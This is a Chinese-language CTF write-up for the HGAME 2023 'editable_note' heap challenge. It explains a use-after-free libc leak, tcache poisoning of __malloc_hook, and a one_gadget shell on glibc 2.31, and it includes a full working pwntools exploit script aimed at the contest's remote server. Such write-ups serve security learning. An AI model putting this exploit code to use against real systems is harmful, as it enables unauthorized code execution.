Problem: [HGAME 2023 week2]editable_note
思路
创8个 0x80 chunk
然后把 8 个 chunk 倒着 free（7→0）：tcache 每个 size 只收 7 个，第 8 个（chunk 0）会进 unsorted bin；如果正着 free，最后进 unsorted bin 的是紧挨 top chunk 的 chunk 7，会被直接合并进 top，拿不到 fd。程序 free 后没有清指针（UAF），直接 show(0) 就能读到 chunk 0 的 fd（main_arena+96），从而泄露 libc。
拿到 libc 后用 UAF 改 tcache 链表头（chunk 1，它是最后一个进 tcache 的）的 fd 指向 __malloc_hook，申请两次，第二次 malloc 返回的就是 __malloc_hook，往里写 one_gadget，再 malloc 一次触发。注意这套打法依赖 glibc 2.31：没有 safe-linking（2.32 起 tcache fd 会被异或保护），且 __malloc_hook 还存在（2.34 已移除）。
getshell!
EXP
from pwn import *
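context.log_level = 'debug'
# Remote is the default (the writeup's target); run `python3 exp.py LOCAL`
# to debug against the local binary instead of hand-toggling a comment.
p = process("./vuln") if args.LOCAL else remote("node5.anna.nssctf.cn", 22380)
e = ELF('./vuln')
# Must be the exact libc the target runs (2.31, Ubuntu 9.17 build): the
# one_gadget offsets and the __malloc_hook/main_arena distance used later
# depend on it.
libc = ELF('/home/rick/glibc-all-in-one/libs/2.31-0ubuntu9.17_amd64/libc-2.31.so')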
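def new(idx, size):
    """Menu option 1 ("Add note"): create note `idx` with the requested size.

    Index and size are sent as bytes so every write to the tube is explicit
    bytes, like the prompts, instead of relying on pwntools' implicit
    str-to-bytes conversion.
    """
    p.sendlineafter(b'>', b'1')
    p.sendlineafter(b'Index:', str(idx).encode())
    p.sendlineafter(b'Size:', str(size).encode())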
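def edit(idx, content):
    """Menu option 3: overwrite note `idx` with `content` (bytes).

    Uses sendlineafter, so a newline follows `content` on the wire; that is
    fine for the 8-byte pointer writes this exploit does, but keep it in mind
    when a write has to be exact.
    """
    p.sendlineafter(b'>', b'3')
    p.sendlineafter(b'Index:', str(idx).encode())
    p.sendlineafter(b'Content: ', content)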
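def show(idx):
    """Menu option 4: print note `idx`.

    Works on freed notes too (the UAF this exploit relies on); the caller
    reads the output off the tube itself.
    """
    p.sendlineafter(b'>', b'4')
    p.sendlineafter(b'Index:', str(idx).encode())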
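def free(idx):
    """Menu option 2: free note `idx`.

    The binary does not clear the stored pointer afterwards, which is why
    show()/edit() on a freed index still work.
    """
    p.sendlineafter(b'>', b'2')
    p.sendlineafter(b'Index:', str(idx).encode())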
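# Allocate 8 chunks of one size: the 0x90 tcache bin holds 7, so the 8th
# free overflows into the unsorted bin, which is what leaks a libc pointer.
for i in range(8):
    new(i, 0x80)
# Free in reverse (7 -> 0). Chunk 7 borders the top chunk, so it must be the
# first one freed (into tcache); freeing it last would send it to the unsorted
# bin and consolidate it into top. Chunk 0 is the one that lands in unsorted.
for i in range(8):
    free(7 - i)
# UAF: the freed note is still readable, so chunk 0's fd (main_arena+96) is
# printed back.
show(0)
# NOTE(review): the [1:7] slice skips one byte of output before the pointer
# (presumably a newline) -- confirm against the binary's show format.
leak = u64(p.recvuntil(b"1. Add note", drop=True)[1:7].ljust(8, b'\x00'))
# As the original arithmetic assumes, on this libc main_arena+96 sits
# 0x10+96 bytes above __malloc_hook; rebase libc from that so every later
# address comes from libc.sym instead of hand-carried offsets.
libc.address = leak - 96 - 0x10 - libc.sym["__malloc_hook"]
log.info(f"libc base => {hex(libc.address)}")
log.info(f"__malloc_hook => {hex(libc.sym['__malloc_hook'])}")
# Tcache poisoning: chunk 1 was the last 0x90 chunk freed into tcache, so it
# is the list head. Pointing its fd at __malloc_hook makes the second
# allocation return the hook (glibc 2.31: no safe-linking, raw fd accepted).
edit(1, p64(libc.sym["__malloc_hook"]))
new(9, 0x80)   # returns chunk 1
new(10, 0x80)  # returns __malloc_hook
# one_gadget offsets for this libc-2.31 build; og[1] is the one whose
# constraints held here. Recompute with `one_gadget` if the libc differs.
og = [0xe3afe, 0xe3b01, 0xe3b04]
edit(10, p64(libc.address + og[1]))
# Any further malloc goes through __malloc_hook; the size is irrelevant.
new(11, 0x50)
# gdb.attach(p)
p.interactive()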
总结
- tcache 同一 size 满 7 个后，第 8 个 free 进 unsorted bin；free 顺序要避免紧挨 top chunk 的那个进 unsorted bin 被合并
- free 后未清指针造成的 UAF：show 读到 unsorted bin 的 fd（main_arena+96）算出 libc 基址，edit 改 tcache 链表头的 fd 做 tcache poisoning
- glibc 2.31 下 tcache fd 无 safe-linking，且 __malloc_hook 仍存在：两次 malloc 拿到 __malloc_hook，写 one_gadget 后再 malloc 一次即 getshell